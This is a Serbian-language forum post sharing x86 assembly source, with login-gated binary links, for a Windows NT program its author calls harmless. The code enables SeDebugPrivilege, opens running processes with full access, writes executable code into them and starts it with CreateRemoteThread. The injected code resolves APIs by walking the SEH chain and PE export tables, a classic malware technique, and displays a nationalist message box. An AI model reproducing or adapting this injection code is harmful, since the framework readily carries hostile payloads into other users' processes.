offline
- Pridružio: 29 Jan 2005
- Poruke: 94
- Gde živiš: Beograd, Srbija
|
Evo jedan lep program za korisnike WinXP ili drugog NT based operativnog sistema =)
Na kraju imte binary ovog koda pa ko voli nek izvoli, program nije destruktivan uopste...
.586
.model flat, stdcall
locals
jumps
include \tasm32\include\useful.inc
include \tasm32\include\mz.inc
include \tasm32\include\pe.inc
null equ 0
MB_OK equ 0
TOKEN_ADJUST_PRIVILEGES equ 20h
SE_PRIVILEGE_ENABLED equ 02h
TOKEN_ASSIGN_PRIMARY equ (0001h)
TOKEN_DUPLICATE equ (0002h)
TOKEN_IMPERSONATE equ (0004h)
TOKEN_QUERY equ (0008h)
TOKEN_QUERY_SOURCE equ (0010h)
TOKEN_ADJUST_GROUPS equ (0040h)
TOKEN_ADJUST_DEFAULT equ (0080h)
TOKEN_ADJUST_SESSIONID equ (0100h)
STANDARD_RIGHTS_REQUIRED equ 0F0000h
TOKEN_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED+TOKEN_ASSIGN_PRIMARY+TOKEN_DUPLICATE+ \
TOKEN_IMPERSONATE+TOKEN_QUERY+TOKEN_QUERY_SOURCE+ \
TOKEN_ADJUST_PRIVILEGES+TOKEN_ADJUST_GROUPS+TOKEN_ADJUST_SESSIONID+ \
TOKEN_ADJUST_DEFAULT)
PROCESS_ALL_ACCESS equ (STANDARD_RIGHTS_REQUIRED + SYNCHRONIZE + 0FFFh)
SYNCHRONIZE equ 100000h
PAGE_EXECUTE_READWRITE equ 40h
MEM_COMMIT equ 1000h
MEM_RESERVE equ 2000h
TOKEN_PRIVILEGES STRUCT
TP_count dd ?
TP_luid dq ?
TP_attrib dd ?
TOKEN_PRIVILEGES ENDS
extrn OpenProcessToken:proc
extrn GetCurrentProcess:proc
extrn LookupPrivilegeValueA:proc
extrn AdjustTokenPrivileges:proc
extrn MessageBoxA:proc
extrn VirtualAllocEx:proc
extrn OpenProcess:proc
extrn WriteProcessMemory:proc
extrn ReadProcessMemory:proc
extrn CreateRemoteThread:proc
extrn EnumProcesses:proc
extrn CloseHandle:proc
extrn GetProcAddress:proc
extrn GetModuleHandleA:proc
extrn ExitProcess:proc
extrn ExitThread:proc
.data
tp TOKEN_PRIVILEGES <>
token dd ?
se_debug db "SeDebugPrivilege",0
mText db "SeDebugPrivilege has been activated",0
procBuf dd 1024 dup(0)
proces dd ?
api_name db "GetProcAddress",0
dll db "kernel32.dll",0
my_base dd ?
hProcess dd ?
counter dd ?
dummy dd ?
curbase dd ?
base dd ?
.code
start:
call GetModuleHandleA, null
mov my_base, eax
mov eax, dword ptr FS:[30h]
push eax
pop curbase
add curbase, 8
call GetCurrentProcess
call OpenProcessToken, eax, TOKEN_ALL_ACCESS, offset token
lea edi, tp.TP_luid
call LookupPrivilegeValueA, null, offset se_debug, edi
mov tp.TP_count, 1
mov tp.TP_attrib, SE_PRIVILEGE_ENABLED
call AdjustTokenPrivileges, token, null, offset tp, size TOKEN_PRIVILEGES, null, null
test eax, eax
jz __exit
call MessageBoxA, null, offset mText, offset se_debug, MB_OK
__exit:
call CloseHandle, token
call EnumProcesses, offset procBuf, 1024*4, offset proces
mov ecx, proces
shr ecx, 2 ;divide by 4
__loop_processes:
mov counter, ecx
mov eax, offset procBuf
mov eax, dword ptr[eax+ecx*4]
call OpenProcess, PROCESS_ALL_ACCESS, 0, eax
test eax, eax
jz __next_process
mov hProcess, eax
call ReadProcessMemory, hProcess, curbase, offset base, 4, offset dummy
mov eax, base
cmp eax, my_base
jne __close_handle
call VirtualAllocEx, hProcess, null, end_RemoteThread-RemoteThread, \
MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE
test eax, eax
jz __close_handle
push eax
call WriteProcessMemory, hProcess, eax, offset RemoteThread,\
end_RemoteThread-RemoteThread, offset dummy
pop eax
call CreateRemoteThread, hProcess, null, null, eax, null, null, offset dummy
__close_handle:
call CloseHandle, hProcess
__next_process:
mov ecx, counter
loop __loop_processes
call ExitProcess, null
RemoteThread:
call KernelBase
@pushsz <"LoadLibraryA">
push eax
call GetProc
@pushsz <"user32.dll">
call eax
@pushsz <"MessageBoxA">
push eax
call GetProc
push MB_OK
@pushsz <"Sloboda ili Smrt">
@pushsz <"Za Slobodu Srpstva i Srbije, poginuti nama zao nije">
push null
call eax
ret
KernelBase:
mov esi, FS:[0]
__seh:
lodsd
cmp eax, 0FFFFFFFFh
je __find_kernel
mov esi, eax
jmp __seh
__find_kernel:
mov edi, [esi+4] ;seh handle
and edi, 0FFFF0000h ;Wipe low word
__spin:
cmp word ptr[edi], 'ZM'
jz __test_pe
sub edi, 10000h
jmp __spin
__test_pe:
mov ebx, edi
add ebx, [ebx.MZ_lfanew]
cmp word ptr[ebx],'EP'
je __ret_kernel_base
jmp __spin
__ret_kernel_base:
mov eax, edi
ret
GetProc:
handle equ dword ptr[ebp+8]
api equ dword ptr[ebp+12]
push ebp
mov ebp, esp
mov esi, api
__api_len:
lodsb
test al, al
jnz __api_len
sub esi, api
mov ecx, esi
mov ebx, handle
add ebx, [ebx.MZ_lfanew]
mov ebx, [ebx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
add ebx, handle
mov edx, [ebx.ED_AddressOfNames]
add edx, handle
sub eax, eax
__find_api:
mov esi, [edx]
add esi, handle
mov edi, offset api
push ecx
cld
repe cmpsb
pop ecx
jz __find_ordinal
add edx, 4
inc eax
jmp __find_api
__find_ordinal:
mov esi, [ebx.ED_AddressOfNameOrdinals]
add esi, handle
sub edx, edx
mov dx, word ptr[esi+eax*2]
mov esi, [ebx.ED_AddressOfFunctions]
add esi, handle
mov eax, [esi+edx*4]
add eax, handle
mov esp, ebp
pop ebp
ret 8
end_RemoteThread:
end start
i binary ->>>>
[Link mogu videti samo ulogovani korisnici]
ili
[Link mogu videti samo ulogovani korisnici]
Ne pokretati u Win98 jer nema APIje koje ovaj program koristi =)))
|
